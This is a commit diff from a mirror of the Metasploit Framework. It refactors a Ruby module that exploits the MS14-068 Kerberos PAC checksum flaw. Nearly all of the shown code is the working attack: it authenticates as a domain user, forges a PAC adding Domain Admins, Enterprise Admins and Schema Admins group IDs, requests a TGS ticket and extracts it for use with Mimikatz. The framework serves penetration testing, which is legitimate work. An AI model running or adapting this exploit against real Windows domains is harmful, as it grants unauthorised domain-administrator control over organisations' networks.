infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean module code

bug/bundler_fix
jvazquez-r7 2014-12-22 14:29:02 -06:00
parent dabc890b2f
commit 20ab14d7a3
1 changed files with 54 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

83
modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
View File

@ -12,9 +12,14 @@ class Metasploit4 < Msf::Auxiliary
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Dummy Kerberos testing module', 'Name' => 'MS14-068 Microsfot Kerberos Checksum Validation Vulnerability',
'Description' => %q{ 'Description' => %q{
Dummy Kerberos testing module This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem
exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS
request, allowing a domain user to forge a PAC with arbitrary privileges, including Domain
Administrator. This module outputs a MIT Kerberos Credential Cache with the privileged
ticket, which can be imported, for example, on Mimikatz. It has been tested successfully on
Windows 2008.
}, },
'Author' => 'Author' =>
[ [
@ -34,76 +39,92 @@ class Metasploit4 < Msf::Auxiliary
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'DisclosureDate' => 'Nov 18 2014' 'DisclosureDate' => 'Nov 18 2014'
)) ))
register_options(
[
OptString.new('USER', [ true, 'The Domain User', 'juan']),
OptString.new('PASSWORD', [ true, 'The Domain User password', 'juan']),
OptString.new('DOMAIN', [ true, 'The Domain Ex: DEMO.LOCAL', 'DEMO.LOCAL']),
OptString.new('DOMAIN_SID', [ true, 'The Domain SID Ex: S-1-5-21-1755879683-3641577184-3486455962', 'S-1-5-21-1755879683-3641577184-3486455962'])
], self.class)
end end
def run def run
print_status("#{peer} - Connecting with the KDC...")
connect(:rhost => datastore['RHOST']) connect(:rhost => datastore['RHOST'])
print_status("Sending AS-REQ...")
my_key = OpenSSL::Digest.digest('MD4', Rex::Text.to_unicode('juan')) unicode_password = Rex::Text.to_unicode(datastore['PASSWORD'])
password_digest = OpenSSL::Digest.digest('MD4', unicode_password)
pre_auth = [] pre_auth = []
pre_auth << build_as_pa_time_stamp(key: my_key) pre_auth << build_as_pa_time_stamp(key: password_digest)
pre_auth << build_pa_pac_request pre_auth << build_pa_pac_request
pre_auth pre_auth
print_status("#{peer} - Sending AS-REQ...")
res = send_request_as( res = send_request_as(
client_name: 'juan', client_name: "#{datastore['USER']}",
server_name: 'krbtgt/DEMO.LOCAL', server_name: "krbtgt/#{datastore['DOMAIN']}",
realm: 'DEMO.LOCAL', realm: "#{datastore['DOMAIN']}",
key: my_key, key: password_digest,
pa_data: pre_auth pa_data: pre_auth
) )
unless res.msg_type == 11 unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
print_error("invalid response :(") print_error("#{peer} - Invalid AS-REP, aborting...")
return return
end end
print_good("good answer!") print_status("#{peer} - Parsing AS-REP...")
print_status("Parsing AS-REP...")
session_key = extract_session_key(res, my_key)
logon_time = extract_logon_time(res, my_key)
session_key = extract_session_key(res, password_digest)
logon_time = extract_logon_time(res, password_digest)
ticket = res.ticket ticket = res.ticket
print_status("Sending TGS-REQ...")
pre_auth = [] pre_auth = []
pre_auth << build_pa_pac_request pre_auth << build_pa_pac_request
groups = [
513, # DOMAIN_USERS
512, # DOMAIN_ADMINS
520, # GROUP_POLICY_CREATOR_OWNERS
518, # SCHEMA_ADMINISTRATORS
519 # ENTERPRISE_ADMINS
]
pac = build_pac( pac = build_pac(
client_name: 'juan', client_name: datastore['USER'],
group_ids: [513, 512, 520, 518, 519], group_ids: groups,
domain_id: 'S-1-5-21-1755879683-3641577184-3486455962', domain_id: datastore['DOMAIN_SID'],
realm: 'DEMO.LOCAL', realm: datastore['DOMAIN'],
logon_time: logon_time, logon_time: logon_time,
) )
auth_data = build_pac_authorization_data(pac: pac) auth_data = build_pac_authorization_data(pac: pac)
print_status("#{peer} - Sending TGS-REQ...")
res = send_request_tgs( res = send_request_tgs(
client_name: 'juan', client_name: datastore['USER'],
server_name: 'krbtgt/DEMO.LOCAL', server_name: "krbtgt/#{datastore['DOMAIN']}",
realm: 'DEMO.LOCAL', realm: datastore['DOMAIN'],
key: my_key, key: password_digest,
logon_time: logon_time, logon_time: logon_time,
session_key: session_key, session_key: session_key,
ticket: ticket, ticket: ticket,
group_ids: [513, 512, 520, 518, 519], group_ids: groups,
domain_id: 'S-1-5-21-1755879683-3641577184-3486455962', domain_id: datastore['DOMAIN_SID'],
auth_data: auth_data, auth_data: auth_data,
pa_data: pre_auth pa_data: pre_auth
) )
unless res.msg_type == 13 unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
print_error("invalid response :(") print_error("#{peer} - Invalid TGS-REP, aborting...")
return return
end end
print_good("Valid TGS-Response") print_good("#{peer} - Valid TGS-Response, extracting credentials...")
cache = extract_kerb_creds(res, 'AAAABBBBCCCCDDDD') cache = extract_kerb_creds(res, 'AAAABBBBCCCCDDDD')